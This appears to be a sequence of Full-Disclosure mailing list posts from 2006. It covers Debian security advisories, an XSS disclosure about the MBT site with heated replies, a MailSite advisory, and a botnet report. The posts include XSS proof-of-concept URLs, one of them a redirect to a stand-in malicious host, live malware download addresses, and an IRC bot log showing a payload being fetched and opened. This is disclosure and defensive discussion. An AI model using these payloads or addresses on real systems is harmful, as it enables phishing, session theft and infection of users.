Re: [Full-disclosure] MBT Xss vulnerability
Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possible but also execution of malicious _javascript_s is possible.Your Lame reply makes me think that you areone of the following: 1.An employee of MBT criticising me in the interest of the company 'or' 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future. Regards; Santosh J. On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Actually,Whats lame is you basing someone for telling others about asecurity vulnerability. Keep posting! -Adriel-Original Message-From: Native.Code [EMAIL PROTECTED]To: MuNNa [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.ukSent: Thu, 19 Jan 2006 21:52:54 +0800Subject: Re: [Full-disclosure] MBT Xss vulnerabilityWhat a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim andbelieve that he/she is doing business with MBT?Your post is yet another proof that FD is more and more inhibited byscipt kiddies. Get a life! On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:Hii List;Recently, i found an Xss vulnerabilty in MBT web site. MBT offersservices from Consulting to Managed Services.It is the Corporate memberof The International Systems Security Engineering Association (ISSEA).BS 7799 (Information Security Management Framework) certifiedorganizationVulnerability:MBT XSS (Cross Site Scripting) Attacks Criticality:MediumDescription:MBT ( http://www.mahindrabt.com/website/index.htm ) is a leadingIndia-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business criticalapplications, MBT enables its clients, protect their investment inlegacy systems, enhance capital budgets, reduce operating expenses andbuild solutions for the multi-services future. However it suffers Xss vulnerability on its own web page.Below is the proof-of-concept which explains this -http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]Re-directing the site to any malicious or fake site to trap the victim :http://www.mahindrabt.com/jse/jsp/search.jsp?q=script document.location='http://www.[evil.site].com'/scriptThough it does not affect sever side alot and may seem harmless, but itcan be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit themalicious weblink under the pretext of some job positions being vacant.Vendor notification:Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond.Regards;Santosh J.___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/Check Out the new free AIM(R) Mail -- 2 GB of storage andindustry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 946-1] New sudo packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 946-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 20th, 2006http://www.debian.org/security/faq - -- Package: sudo Vulnerability : missing input sanitising Problem type : local Debian-specific: no CVE IDs: CVE-2005-4158 CVE-2006-0151 Debian Bug : 342948 It has been discovered that sudo, a privileged program, that provides limited super user privileges to specific users, passes several environment variables to the program that runs with elevated privileges. In the case of include paths (e.g. for Perl, Python, Ruby or other scripting languages) this can cause arbitrary code to be executed as privileged user if the attacker points to a manipulated version of a system library. This update alters the former behaviour of sudo and limits the number of supported environment variables to LC_*, LANG, LANGUAGE and TERM. Additional variables are only passed through when set as env_check in /etc/sudoers, which might be required for some scripts to continue to work. For the old stable distribution (woody) this problem has been fixed in version 1.6.6-1.5. For the stable distribution (sarge) this problem has been fixed in version 1.6.8p7-1.3. For the unstable distribution (sid) this problem has been fixed in version 1.6.8p12-1. We recommend that you upgrade your sudo package. For unstable Defaults = env_reset need to be addeed to /etc/sudoers manually. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5.dsc Size/MD5 checksum: 587 5283a27497c0b72d5b6e76f9b667e01e http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5.diff.gz Size/MD5 checksum:12656 f222453e31614c7acfc5f2dacfa50b7b http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6.orig.tar.gz Size/MD5 checksum: 333074 4da4bf6cf31634cc7a17ec3b69fdc333 Alpha architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_alpha.deb Size/MD5 checksum: 151566 0962195516363a6c70b74f41891df48a ARM architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_arm.deb Size/MD5 checksum: 141552 b302ac8539e200fa462b36486496c4d3 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_i386.deb Size/MD5 checksum: 135038 6a4e4f7c16f10019bed84e62ba8ec57f Intel IA-64 architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_ia64.deb Size/MD5 checksum: 172514 5ddbbf5863765b4cea3f385e0f0fe47a HP Precision architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_hppa.deb Size/MD5 checksum: 147622 b285216580ae99baf70a03dfe42281f4 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_m68k.deb Size/MD5 checksum: 132792 08c2595bb7daf654dbbfd8714f1e1d3e Big endian MIPS architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_mips.deb Size/MD5 checksum: 144486 c58264be61e612b1e5bc79d20c956cfb Little endian MIPS architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_mipsel.deb Size/MD5 checksum: 144358 e84c5ae3472ea691625e5e8884873891 PowerPC architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_powerpc.deb Size/MD5 checksum: 140702 29508f07787ae9ae35d8d9ad631a3201 IBM S/390 architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_s390.deb Size/MD5 checksum: 140338 f4872d03a171887c001f93ab86ef79b2 Sun Sparc architecture: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_sparc.deb Size/MD5 checksum: 143150 d80fb2c644c9171a19834711abde3df1 Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3.dsc Size/MD5 checksum: 571 f913c6cb8244c9d003518129d88295e8 http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3.diff.gz Size/MD5 checksum:20818
[Full-disclosure] [SECURITY] [DSA 947-1] New ClamAV packages fix heap overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 947-1 [EMAIL PROTECTED] http://www.debian.org/security/ Michael Stone January 21st, 2006 http://www.debian.org/security/faq - -- Package: clamav Vulnerability : heap overflow Problem type : remote Debian-specific: no CVE IDs: CVE-2006-0162 Debian Bug : 320014 A heap overflow has been discovered in ClamAV, a virus scanner, which could allow an attacker to execute arbitrary code by sending a carefully crafted UPX-encoded executable to a system runnig ClamAV. In addition, other potential overflows have been corrected. The old stable distribution (woody) does not include ClamAV. For the stable distribution (sarge) this problem has been fixed in version 0.84-2.sarge.7. For the unstable distribution (sid) this problem has been fixed in version 0.86.2-1. We recommend that you upgrade your clamav package immediately. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.7.dsc Size/MD5 checksum: 872 df3aecc6060155de842ad1851143d85c http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.7.diff.gz Size/MD5 checksum: 179637 b25e29ec071c32768df2689f3d7061a4 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c Architecture independent components: http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.7_all.deb Size/MD5 checksum: 154692 5149fc2bd991fd87863932ed0ac3e7fd http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.7_all.deb Size/MD5 checksum: 690338 5b7e9db683622fb49b766bfbd9168a4d http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.7_all.deb Size/MD5 checksum: 123696 6707d97d0544a6cd245d75f3aa1542b1 Alpha architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.7_alpha.deb Size/MD5 checksum:74672 bfd688e1fa1041d819c3319aa15a8530 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.7_alpha.deb Size/MD5 checksum:48798 673fc52d2a3fe74bef2637114f2cd453 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.7_alpha.deb Size/MD5 checksum: 2176344 49586708a8006ec8f32e0128e817d2a7 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.7_alpha.deb Size/MD5 checksum:42110 2f52766489cba71f29daf38455b52020 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.7_alpha.deb Size/MD5 checksum: 255576 f813f572a9b8b83225e4e9ad24461a17 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.7_alpha.deb Size/MD5 checksum: 285310 0135368aab8cb6def0573b62de849964 AMD64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.7_amd64.deb Size/MD5 checksum:68868 cd0022f63fbd4b64b662c8c8aa092d3e http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.7_amd64.deb Size/MD5 checksum:44190 4db755a324f658589732bd2ce6aa4b8d http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.7_amd64.deb Size/MD5 checksum: 2173202 cb7d17d25ee13d02ce8c72e0ed06a3e9 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.7_amd64.deb Size/MD5 checksum:39994 63e129299ea15b26a4ade57e96a452b8 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.7_amd64.deb Size/MD5 checksum: 176356 5846918c951fac82f23a88619a2cea3d http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.7_amd64.deb Size/MD5 checksum: 259488 5df5123b2619575ea5e90ba71f24 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.7_i386.deb Size/MD5 checksum:65156 1946d6cf8d0af3ebf4ed758f59c19b65 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.7_i386.deb Size/MD5
[Full-disclosure] [SECURITY] [DSA 948-1] New kdelibs packages fix buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 948-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff January 20th, 2005 http://www.debian.org/security/faq - -- Package: kdelibs Vulnerability : buffer overflow Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-0019 Maksim Orlovich discovered that the kjs Javascript interpreter, used in the Konqueror web browser and in other parts of KDE, performs insufficient bounds checking when parsing UTF-8 encoded Uniform Resource Identifiers, which may lead to a heap based buffer overflow and the execution of arbitrary code. The old stable distribution (woody) is not affected by this problem. For the stable distribution (sarge) this problem has been fixed in version 3.3.2-6.4 For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your kdelibs package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.3.2-6.4.dsc Size/MD5 checksum: 1255 3476894f94312ebd9c2c8a09fa226b87 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.3.2-6.4.diff.gz Size/MD5 checksum: 404799 fcd85446682b6dc93ff4f286eeaa9a66 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.3.2.orig.tar.gz Size/MD5 checksum: 18250342 04f10ddfa8bf9e359f391012806edc04 Architecture independent components: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-data_3.3.2-6.4_all.deb Size/MD5 checksum: 7094358 0ef3c6eab6e97a739396eb2fc3d6d64e http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-doc_3.3.2-6.4_all.deb Size/MD5 checksum: 11532706 aa95fe32a20da29f86f7e2aa266beb45 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.3.2-6.4_all.deb Size/MD5 checksum:27936 b36ba70cd31eed4b283612df82d06ac5 Alpha architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-bin_3.3.2-6.4_alpha.deb Size/MD5 checksum: 995496 4bfb3202b2c09187a3db6353651616e7 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4_3.3.2-6.4_alpha.deb Size/MD5 checksum: 9283450 89c2d4bf7eaafffbdcbe2f5cde9989d6 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.3.2-6.4_alpha.deb Size/MD5 checksum: 1245938 359d7c089f1fc049e48e6b51b16788af AMD64 architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-bin_3.3.2-6.4_amd64.deb Size/MD5 checksum: 923642 18c3ce5715619fa03aad58f705d9d2fa http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4_3.3.2-6.4_amd64.deb Size/MD5 checksum: 8514354 3e36f3fa8e412aa65b02257e57c1f5d4 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.3.2-6.4_amd64.deb Size/MD5 checksum: 1241634 22b57b5cf22a17b96aa9f5e5ab6428a4 ARM architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-bin_3.3.2-6.4_arm.deb Size/MD5 checksum: 810878 5386387b194090aeb29f4c4b06af9024 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4_3.3.2-6.4_arm.deb Size/MD5 checksum: 7595288 4bce1f87ecc765cbf899707c0ecac72c http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.3.2-6.4_arm.deb Size/MD5 checksum: 1239290 a8ace690bf0f720d2b6d32b001d380f3 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-bin_3.3.2-6.4_i386.deb Size/MD5 checksum: 864336 95856f030d0317644a8dac9664166149 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4_3.3.2-6.4_i386.deb Size/MD5 checksum: 8203306 35ae7ad514fbf1ddd5dc3f5c0ffdfb62 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.3.2-6.4_i386.deb Size/MD5 checksum: 1240288 34248445bfa13b95d53f64819d6cda06 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-bin_3.3.2-6.4_ia64.deb Size/MD5 checksum: 1148478 e1f8faca8072df9854593b7f67c2b611 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4_3.3.2-6.4_ia64.deb Size/MD5 checksum: 10773556 a7dd56a0a94c28eeeab4a7951f479ad9
[Full-disclosure] [SECURITY] [DSA 949-1] New crawl packages fix potential group games execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 949-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 20th, 2006 http://www.debian.org/security/faq - -- Package: crawl Vulnerability : insecure program execution Problem type : local Debian-specific: no CVE ID : CVE-2006-0044 Steve Kemp from the Debian Security Audit project discovered a security related problem in crawl, another console based dungeon exploration game in the vein of nethack and rogue. The program executes commands insecurely when saving or loading games which can allow local attackers to gain group games privileges. For the old stable distribution (woody) this problem has been fixed in version 4.0.0beta23-2woody2. For the stable distribution (sarge) this problem has been fixed in version 4.0.0beta26-4sarge0. For the unstable distribution (sid) this problem has been fixed in version 4.0.0beta26-7. We recommend that you upgrade your crawl package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2.dsc Size/MD5 checksum: 615 3f43365164bb10f1e1acf6978cb40b96 http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2.diff.gz Size/MD5 checksum: 6982 59cb94176b9b70553b12ca6cedd87c34 http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23.orig.tar.gz Size/MD5 checksum: 1047863 6b988caff871f0df1c8f3cc907f2fce6 Alpha architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_alpha.deb Size/MD5 checksum: 846396 f9bc757f015f556a80ecaae3b02d48c1 ARM architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_arm.deb Size/MD5 checksum: 612204 287415a45872ef965aba999a64c83298 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_i386.deb Size/MD5 checksum: 597416 d1a3b10417453873118380d75c074516 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_ia64.deb Size/MD5 checksum: 873002 b6f756cc288bd81c8be43cc7a1b1cb31 HP Precision architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_hppa.deb Size/MD5 checksum: 710704 66c4a5c9277e542247883f1de8775fd1 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_m68k.deb Size/MD5 checksum: 582424 ea8e73fad36a8715025aa8b55143c1bd Big endian MIPS architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_mips.deb Size/MD5 checksum: 682570 32a1e35f4f6f337fcffc36f17dd305fe Little endian MIPS architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_mipsel.deb Size/MD5 checksum: 680114 e208b391467dcbe619f3644f890afddd PowerPC architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_powerpc.deb Size/MD5 checksum: 627098 341b7a34dfb134ca29432f46194eba08 IBM S/390 architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_s390.deb Size/MD5 checksum: 595318 cc5e2b868ff1347e31c1439ef0b163d8 Sun Sparc architecture: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta23-2woody2_sparc.deb Size/MD5 checksum: 618824 9e320393a2160741925518dac490d3bb Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta26-4sarge0.dsc Size/MD5 checksum: 605 82e38ba8b803845dfbcedddc5c434951 http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta26-4sarge0.diff.gz Size/MD5 checksum: 9558 720e80e44a34e38026ba2e92cd54e3bf http://security.debian.org/pool/updates/main/c/crawl/crawl_4.0.0beta26.orig.tar.gz Size/MD5 checksum: 555 8419fb9f161e91e6b1972cdd43b2ac29 Alpha architecture:
[Full-disclosure] new nokia bluetooth worms...
if anyone catches this please let me know and hook a brotha up with a copy. http://isc.sans.org/diary.php?storyid=1056 As a side note its nice to know that that the UK style Bluetooth Advertising HAS hit the US finally. Lots of vendors are still NOT signing their .SIS files! -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability
OS2A RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability OS2A ID: OS2A_1004 Status 01/06/2006 Issue Discovered 01/06/2006 Reported to the vendor 01/19/2006 Patch Released 01/20/2006 Advisory Released Class: Denial of Service / Script Injection Severity: CRITICAL Overview: Rockliffe's MailSite is a program for providing access to email accounts on Microsoft Windows operating systems. MailSite HTTP Mail management agent could allow a remote attacker to cause a denial of service or execute arbitrary script code. Description: 1. MailSite HTTP Mail management agent 7.0.3.1 version could allow a remote attacker cause a denial of service. A bug in the input validation routine in httpma causes the svchost process to consume more CPU cycles thus impacting Mailsite HTTP Management agent and ultimately crashing the service. 2. MailSite HTTP Mail management agent 6.x and 5.x could allow a remote attacker to inject arbitrary script code. This vulnerability is caused due to a design error in the wconsole.dll. This dll file contains html code embedded in it which is not properly sanitizing the user-input. Impact: 1. Remote attackers can exploit this issue to trigger a denial of service condition. 2. An attacker may leverage this issue to have arbitrary script code executed in the browser in the context of the affected site. Affected Software(s): MailSite 7.0.3.1 and prior MailSite 6.1.22 and prior MailSite 5.x Affected platform(s): Windows (Any) Exploit/Proof of Concept: For 7.x series http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?Authenticate|cmd Any special characters passed to the parameters in the wconsole.dll triggers denial of service. For 6.x 5.x series http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert(document.cookie)%3C/script%3E Solutions: For 7.x series apply the following patch. ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/ For 6.x series apply the following patch ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/ Credits: Rahul Mohandas of OS2A has been credited with the discovery of this vulnerability. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible large botnet
Is it just me who thinks linking to a log of thousands of e-mail addresses is in very poor taste on a mirrored list? If they weren't harvested before they will be now. -sb On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I don't necessarily think whomever was infected was infected via viewing this site: http://php.tjit.or.kr/ppp/log/sent.txt Lists a slew of email addresses which whomever could have sent bogus messages to possibly infect (l)users. On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban [EMAIL PROTECTED] wrote: Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this. D O N O T C L I C K http://213.17.233.194/mediabar.wmf http://213.17.233.194/stat_s3.php http://213.17.233.194/stat.html D O N O T C L I C K This injects a trojan connecting to 219.240.142.59 on port 44234 44234/tcp open irc Unreal ircd 47292/tcp open irc Unreal ircd 47296/tcp open irc Unreal ircd 54729/tcp open irc-proxypsyBNC 2.3.1 Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started. The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!). NICK * USER plnaehe 0 0 :* :irc.foonet.com NOTICE AUTH :*** Looking up your hostname... :irc.foonet.com NOTICE AUTH :*** Found your hostname :irc.foonet.com 001 *:Welcome to the ROXnet IRC Network * :irc.foonet.com 002 *:Your host is irc.foonet.com, running version Unreal3.2.3 :irc.foonet.com 003 *:This server was created Thu Oct 13 2005 at 17:25:57 KST :irc.foonet.com 005 *SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server :irc.foonet.com 005 *SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT [EMAIL PROTECTED] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server :irc.foonet.com 251 *:There are 1 users and 1194 invisible on 1 servers :irc.foonet.com 252 *1 :operator(s) online :irc.foonet.com 253 *201 :unknown connection(s) :irc.foonet.com 254 *10 :channels formed :irc.foonet.com 255 *:I have 1195 clients and 0 servers :irc.foonet.com 265 *:Current Local Users: 1195 Max: 5529 :irc.foonet.com 266 *:Current Global Users: 1195 Max: 1276 :irc.foonet.com 422 *:MOTD File is missing *MODE *:+iwTxd USERHOST * :irc.foonet.com 302 *:* MODE *-x+B JOIN #mrbean5 rowan PRIVMSG *:[KEYLOG]: Key logger active. USERHOST * MODE *-x+B JOIN #mrbean5 rowan USERHOST * MODE *-x+B JOIN #mrbean5 rowan :irc.foonet.com NOTICE *:BOTMOTD File not found *MODE *:-x+B * JOIN :#mrbean5 :irc.foonet.com 332 *#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3 :irc.foonet.com 333 *#mrbean5 DDDI 1137401387 :irc.foonet.com 353 *@ #mrbean5 * :irc.foonet.com 366 *#mrbean5 :End of /NAMES list. *PRIVMSG *:[KEYLOG]: Key logger active. :irc.foonet.com 302 * :irc.foonet.com 302 * PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll. :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec. PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll. :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) _ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA oIe+zN0P1qsDz+gfy4da+vfZ+A3y =suSR -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no
Re: [Full-disclosure] MBT Xss vulnerability
Hey guy, do you know something about XSS 1) Phishing? 2) encoded URL, UTF8...? 3) cookie steal? ... it'll not be difficult to reproduce a website and have an url difficult to understand for a basic user... sure it's harder to spoof the url in the browser... // Native.Code a écrit : What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! - About FD: Speech is silver, but silence is gold /JA /https://www.securinfos.info/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Well I'm not going to talk about how XSS is useless because we all know it can be quite a serious problem. I think, and I don't know the guy so I can't be sure, the original dissenter to this post was pointing out that: What would you phish from a site that doesn't have any forms anyways? What would stealing a session cookie get you if the only dynamic content is a search function? I'm not saying XSS isn't important, I'm just wondering why this case is? -sb On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote: Hey guy, do you know something about XSS 1) Phishing? 2) encoded URL, UTF8...? 3) cookie steal? ... it'll not be difficult to reproduce a website and have an url difficult to understand for a basic user... sure it's harder to spoof the url in the browser... // Native.Code a écrit : What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! - About FD: Speech is silver, but silence is gold /JA /https://www.securinfos.info/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
Nancy, I was not trying to make the point that ZA is some buggy unusable crap. Just that even properly configured we have encountered instances where it misbehaves, behaves inconsistently, and slows down web browsing with IE (not so much with opera or firefox apparently as I tried that out last night under a few setups). That said, configuring it correctly is key to its operation, if you misclicked at some point and accidently set a rule not to allow certain traffic or a certain application access to the network then you may experience the problems you describe. Please make sure you review all the rules and specific application settings to make sure your problems aren't configuration-related. -sb On 1/20/06, Nancy Kramer [EMAIL PROTECTED] wrote: I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL 